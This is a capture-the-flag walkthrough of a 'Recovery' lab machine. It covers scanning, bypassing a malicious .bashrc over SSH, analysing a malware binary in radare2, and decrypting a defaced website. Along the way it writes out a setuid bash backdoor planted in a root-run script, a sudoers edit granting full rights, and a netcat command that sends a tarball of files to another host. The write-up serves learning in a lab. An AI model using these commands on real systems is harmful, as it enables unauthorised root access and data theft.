In this post, i would like to share a walkthrough of the Recovery Room.
This room has been considered difficulty rated as a MEDIUM machine
Malware Analysis is not really my forte and I learn a lot from this room. As a result, I have tried the Recovery Room multiple times which resulted in a different IP on my screenshot later and I’m sorry for that.
We need to deploy the machine for us to play with the machine
Start playing with the Recovery room
Once the machine is fully up within 3 minutes, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN
There are multiple ports that have been open but the crucial port that caught my attention
- 22: OpenSSH 7.2p2
- 80: Apache httpd 2.4.43
However, we are provided with some useful information such as SSH credentials that we will need to use along the way. Aside from that, we also can track the progress on port 1337
Let’s see the website
Oh no! The website has been encrypted and nothing that we can do for now.
SSH Access on the Recovery machine
Let’s SSH into the machine
We cannot properly access the machine via ssh because the malware has affected the machine
let run the ssh service by execute ssh alex@<IP Address> “/bin/bash”
We can access the machine via /bin/bash
From the listing, I notice that .bashrc file was stored there.
Let’s rename the file by executing mv .bashrc .bashrc_backup
Let’s try to login via SSH service again
Oh wow! We successfully login without any error message appearing like before.
However, you will be disconnected from the machine, and we need to investigate later.
Play with the fixutil binary on Recovery room
Let’s grab the file by using scp alex@<IP Address>:fixutil .
I need to disable the file so that they will not affect our own machine.
We need to analyze the fixutil file where we might discover something important to us in getting everything back to normal.
While scrolling down the file, we found the malicious code that we need to delete from .bashrc (the file that we edited to .bashrc_backup file earlier)
Analyze the file by forensic method
There’s a line that executes the bash scripting at /opt/brilliant_script.sh location. Let’s grab the file for us to analyze furthermore.
We need to disable the file so that they will not affect our own machine.
I can see that some scripts have been saved in the brilliant_script.sh file
We need to clear the content inside the file and replace it with the content below
cp /bin/bash /bin/shell
chmod +x /bin/shell
chmod u+s /bin/shell
We must save the content so that it will take effect later
I need to analyze the malware file using radare2.
* Reminder: There are a lot of malware analysis tools such as IDA PRO, Ghidra, and so on. I plan to use radare instead here
Playing with radare tool
We need to run the command r2 fixutil and follow the next command as below:
> s main
It will look like the above.
While we analyze the malware file, I notice there was a process going on such as the malware file have been copy-paste with the old and legit file to /tmp/logging.so and renaming it into oldliblogging.so
After successfully the above process, the malware will automatically include a malicious code into the current file (liblogging.so)
What we need to do now is that revert the oldliblogging.so to the current liblogging.so
I also notice there’s an SSH session that required authorized keys at /root/.ssh directory which the key needs to be deleted
Next, we must access the password file by executing nano /etc/passwd. When we are inside the file, we need to remove everything on “security user” which look like the screenshot above.
Trying to fix the issues
We also need to add alex privileges to ALL in the /etc/sudoers so that we can access as root.
For us to access the machine as root, we need to run the command sudo shell and then shell -p
Let’s find the malware’s key so that we can fix the website back to normal.
For us to achieve that purpose, we need to access /opt/.fiixutil and there’s a backup.txt file saved in the directory
We have the key to decrypt the file
The files that are required to decrypt can be found at /usr/local/apache2/htdocs
We need to transfer all the files over here into our own machine so that it will be easier to decrypt the file. Firstly, we need to tar -cvf backup.tar * where it will zip everything into a tar file
Once that has been completed, we can use the method below:
- On our own machine: We need to run nc -lvp any port > backup.tar
- On Target’s machine: We need to run nc IP Address port < backup.tar
It should look like the screenshot above
Let’s extract the tar file so that we can use those files to decrypt
For this purpose, i will use the XOR Recipe and use the key that we found just now. Aside from that, we use UTF8 as the output result where the encrypted file will be uploaded on the Input section
We need to clean every content in the file and replace it with the decrypted content in the clean file
You will need to repeat the same process with the remaining 2 files which are required to be decrypted too.
When you have finished replacing the actual content into the file, you will see the website interface just shown as above (You need to refresh back the affected page before)
On <IP Address>:1337, you will need to click the refresh button and all the flag will appear for you to key in the room.
You must delete all the affected files in the machine to ensure the machine is clean from any malicious code
Happy Learning Guys!